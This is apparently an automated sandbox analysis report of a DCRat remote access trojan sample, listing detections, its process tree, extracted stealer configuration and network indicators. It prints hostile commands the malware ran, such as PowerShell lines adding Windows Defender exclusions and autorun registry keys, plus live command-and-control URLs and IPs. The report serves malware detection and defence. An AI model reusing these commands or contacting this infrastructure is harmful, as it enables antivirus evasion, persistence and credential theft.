Edit tour

Windows Analysis Report
ogVinh0jhq.exe

Overview

General Information

Sample name:	ogVinh0jhq.exe renamed because original name is a hash value
Original sample name:	11233270109a3d109a5e332c13c47f86.exe
Analysis ID:	1583534
MD5:	11233270109a3d109a5e332c13c47f86
SHA1:	37a57b1b1850ac7927f827d8748627b3007a798c
SHA256:	757ddfaea3c3fe1d283195f096eebe58fb45d87359773e3a53a983d5b78a6f04
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Connects to a pastebin service (likely for C&C)

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Creates processes via WMI

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Protects its processes via BreakOnTermination flag

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: System File Execution Location Anomaly

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains executable resources (Code or Archives)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

ogVinh0jhq.exe (PID: 7456 cmdline: "C:\Users\user\Desktop\ogVinh0jhq.exe" MD5: 11233270109A3D109A5E332C13C47F86)

powershell.exe (PID: 7588 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ogVinh0jhq.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7596 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ogVinh0jhq.exe (PID: 7844 cmdline: "C:\Users\user\Desktop\ogVinh0jhq.exe" MD5: 11233270109A3D109A5E332C13C47F86)

powershell.exe (PID: 8104 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ogVinh0jhq.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8112 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\ITlIQtTGhEyfMRHaLp.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 2992 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

cmd.exe (PID: 5960 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TJHXkWh8sx.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

w32tm.exe (PID: 4464 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

ogVinh0jhq.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\ogVinh0jhq.exe" MD5: 11233270109A3D109A5E332C13C47F86)

RuntimeBroker.exe (PID: 7812 cmdline: C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe MD5: 11233270109A3D109A5E332C13C47F86)

RuntimeBroker.exe (PID: 7836 cmdline: C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe MD5: 11233270109A3D109A5E332C13C47F86)

ITlIQtTGhEyfMRHaLp.exe (PID: 8036 cmdline: C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\ITlIQtTGhEyfMRHaLp.exe MD5: 11233270109A3D109A5E332C13C47F86)

ITlIQtTGhEyfMRHaLp.exe (PID: 8048 cmdline: C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\ITlIQtTGhEyfMRHaLp.exe MD5: 11233270109A3D109A5E332C13C47F86)

RuntimeBroker.exe (PID: 7456 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe" MD5: 11233270109A3D109A5E332C13C47F86)

ITlIQtTGhEyfMRHaLp.exe (PID: 3652 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe" MD5: 11233270109A3D109A5E332C13C47F86)

RuntimeBroker.exe (PID: 1436 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe" MD5: 11233270109A3D109A5E332C13C47F86)

ITlIQtTGhEyfMRHaLp.exe (PID: 5696 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe" MD5: 11233270109A3D109A5E332C13C47F86)

RuntimeBroker.exe (PID: 4592 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe" MD5: 11233270109A3D109A5E332C13C47F86)

ITlIQtTGhEyfMRHaLp.exe (PID: 6536 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe" MD5: 11233270109A3D109A5E332C13C47F86)

ITlIQtTGhEyfMRHaLp.exe (PID: 7640 cmdline: "C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe" MD5: 11233270109A3D109A5E332C13C47F86)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"w\":\".\",\"U\":\">\",\"y\":\"*\",\"v\":\" \",\"L\":\"`\",\"N\":\"~\",\"3\":\"#\",\"o\":\"$\",\"Y\":\"(\",\"i\":\"!\",\"m\":\"@\",\"F\":\"-\",\"R\":\";\",\"J\":\"|\",\"Q\":\"%\",\"S\":\",\",\"H\":\"<\",\"c\":\"&\",\"j\":\")\",\"M\":\"^\",\"b\":\"_\"}", "PCRT": "{\"B\":\"!\",\"U\":\"`\",\"C\":\"$\",\"Z\":\"(\",\"T\":\";\",\"X\":\"*\",\"S\":\"%\",\"N\":\"@\",\"Q\":\"^\",\"0\":\".\",\"M\":\"|\",\"3\":\"<\",\"n\":\">\",\"F\":\")\",\"W\":\"&\",\"l\":\" \",\"V\":\"-\",\"E\":\"#\",\"2\":\",\",\"J\":\"~\",\"p\":\"_\"}", "TAG": "", "MUTEX": "DCR_MUTEX-kOjrauLw58cHzMGU5vna", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 3, "AURD": "{SYSTEMDRIVE}/Users/{USERNAME}/AppData/Local/Microsoft/Windows/Explorer", "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%SystemDrive% - Slow"}, "AS": true, "ASO": true, "AD": false}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000021.00000002.2311289217.0000000002E71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000022.00000002.2540068591.00000000033AE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000E.00000002.2228709323.00000000025C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000A.00000002.1725669334.0000000002D04000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000F.00000002.2216061800.000000000262E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000018.00000002.1880725474.0000000002E90000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000020.00000002.2233192227.00000000025A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000008.00000002.2913632595.0000000005282000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000000.00000002.1679368399.0000000002700000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000F.00000002.2216061800.00000000025F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000008.00000002.2913632595.0000000005324000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000000.00000002.1679368399.00000000025C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001F.00000002.2153003374.00000000030A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.1679368399.00000000027B7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001E.00000002.2062337075.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000008.00000002.2913632595.000000000539C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
0000001B.00000002.1978274690.000000000234D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000008.00000002.2913632595.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000E.00000002.2228709323.00000000025FE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000018.00000002.1880725474.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000021.00000002.2311289217.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000009.00000002.2208718575.0000000003411000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001B.00000002.1978274690.0000000002351000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000008.00000002.2913632595.00000000052BB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
00000019.00000002.1893760638.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000022.00000002.2540068591.0000000003371000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000A.00000002.1725669334.0000000002C38000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000A.00000002.1725669334.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.1681720996.00000000125CF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ogVinh0jhq.exe PID: 7456	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 7812	JoeSecurity_DCRat_3	Yara detected DCRat	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 7812	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 7836	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ogVinh0jhq.exe PID: 7844	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ITlIQtTGhEyfMRHaLp.exe PID: 8036	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ITlIQtTGhEyfMRHaLp.exe PID: 8048	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ogVinh0jhq.exe PID: 7480	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 7456	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ITlIQtTGhEyfMRHaLp.exe PID: 3652	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 1436	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ITlIQtTGhEyfMRHaLp.exe PID: 5696	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 4592	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ITlIQtTGhEyfMRHaLp.exe PID: 6536	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ITlIQtTGhEyfMRHaLp.exe PID: 7640	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 40 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\ogVinh0jhq.exe, ProcessId: 7456, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ogVinh0jhq.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ogVinh0jhq.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ogVinh0jhq.exe", ParentImage: C:\Users\user\Desktop\ogVinh0jhq.exe, ParentProcessId: 7456, ParentProcessName: ogVinh0jhq.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ogVinh0jhq.exe', ProcessId: 7588, ProcessName: powershell.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe, CommandLine: C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe, NewProcessName: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe, OriginalFileName: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe, ProcessId: 7812, ProcessName: RuntimeBroker.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ogVinh0jhq.exe, ProcessId: 7456, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ogVinh0jhq.exe, ProcessId: 7456, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ogVinh0jhq.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ogVinh0jhq.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ogVinh0jhq.exe", ParentImage: C:\Users\user\Desktop\ogVinh0jhq.exe, ParentProcessId: 7456, ParentProcessName: ogVinh0jhq.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ogVinh0jhq.exe', ProcessId: 7588, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE DCRAT Activity (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T00:27:13.768439+0100	2034194	1	A Network Trojan was detected	192.168.2.4	49733	141.8.192.151	80	TCP

ETPRO MALWARE DCRat Initial Checkin Server Response M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T00:27:43.567663+0100	2850862	1	Malware Command and Control Activity Detected	141.8.192.151	80	192.168.2.4	49743	TCP
2025-01-03T00:28:46.568351+0100	2850862	1	Malware Command and Control Activity Detected	141.8.192.151	80	192.168.2.4	50015	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: ogVinh0jhq.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://f1070307.xsph.ru/	Avira URL Cloud: Label: malware
Source: http://f1070307.xsph.ru	Avira URL Cloud: Label: malware
Source: http://f1070307.xsph.ru/3b39b74d.php?xKlF8KllZirEiSsOnQXHCc8kKL=7O2j5PKlq1uIopZOWJVxmo&faRRxVLB5xenW	Avira URL Cloud: Label: malware
Source: http://f1070307.xsph.ru/3b39b74d.php?CrX=gZ5mjnRizKIjk&376779f86c177c4b75812d1e24e5499c=91232e7e14c7cef9e28ece2cb253607d&6cf4e82f6b2961308157eadafeeff42f=gYldDNkNzM4MjZiVjM1ITN3gTYjRTMiN2Y5kTMlNTZ4M2M3Q2M3Q2M&CrX=gZ5mjnRizKIjk	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\TJHXkWh8sx.bat	Avira: detection malicious, Label: BAT/Delbat.C

Found malware configuration

Source: RuntimeBroker.exe.1436.30.memstrmin

Malware Configuration Extractor: DCRat {"SCRT": "{\"w\":\".\",\"U\":\">\",\"y\":\"*\",\"v\":\" \",\"L\":\"`\",\"N\":\"~\",\"3\":\"#\",\"o\":\"$\",\"Y\":\"(\",\"i\":\"!\",\"m\":\"@\",\"F\":\"-\",\"R\":\";\",\"J\":\"|\",\"Q\":\"%\",\"S\":\",\",\"H\":\"<\",\"c\":\"&\",\"j\":\")\",\"M\":\"^\",\"b\":\"_\"}", "PCRT": "{\"B\":\"!\",\"U\":\"`\",\"C\":\"$\",\"Z\":\"(\",\"T\":\";\",\"X\":\"*\",\"S\":\"%\",\"N\":\"@\",\"Q\":\"^\",\"0\":\".\",\"M\":\"|\",\"3\":\"<\",\"n\":\">\",\"F\":\")\",\"W\":\"&\",\"l\":\" \",\"V\":\"-\",\"E\":\"#\",\"2\":\",\",\"J\":\"~\",\"p\":\"_\"}", "TAG": "", "MUTEX": "DCR_MUTEX-kOjrauLw58cHzMGU5vna", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 3, "AURD": "{SYSTEMDRIVE}/Users/{USERNAME}/AppData/Local/Microsoft/Windows/Explorer", "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%SystemDrive% - Slow"}, "AS": true, "ASO": true, "AD": false}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	ReversingLabs: Detection: 78%

Multi AV Scanner detection for submitted file

Source: ogVinh0jhq.exe

ReversingLabs: Detection: 78%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: ogVinh0jhq.exe

Joe Sandbox ML: detected

Source: ogVinh0jhq.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: ogVinh0jhq.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: kC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: eC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: gC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: RuntimeBroker.exe, 00000008.00000002.2913632595.0000000002E58000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\ogVinh0jhq.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	File opened: C:\Users\user\AppData	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.4:49733 -> 141.8.192.151:80
Source: Network traffic	Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 141.8.192.151:80 -> 192.168.2.4:49743
Source: Network traffic	Suricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 141.8.192.151:80 -> 192.168.2.4:50015

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Source: Joe Sandbox View	IP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox View	IP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox View	IP Address: 141.8.192.151 141.8.192.151
Source: Joe Sandbox View	IP Address: 141.8.192.151 141.8.192.151

Source: Joe Sandbox View

ASN Name: SPRINTHOSTRU SPRINTHOSTRU

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: GET /raw/5YGpPGYJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /3b39b74d.php?CrX=gZ5mjnRizKIjk&376779f86c177c4b75812d1e24e5499c=91232e7e14c7cef9e28ece2cb253607d&6cf4e82f6b2961308157eadafeeff42f=gYldDNkNzM4MjZiVjM1ITN3gTYjRTMiN2Y5kTMlNTZ4M2M3Q2M3Q2M&CrX=gZ5mjnRizKIjk HTTP/1.1Accept: /Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: f1070307.xsph.ruConnection: Keep-Alive
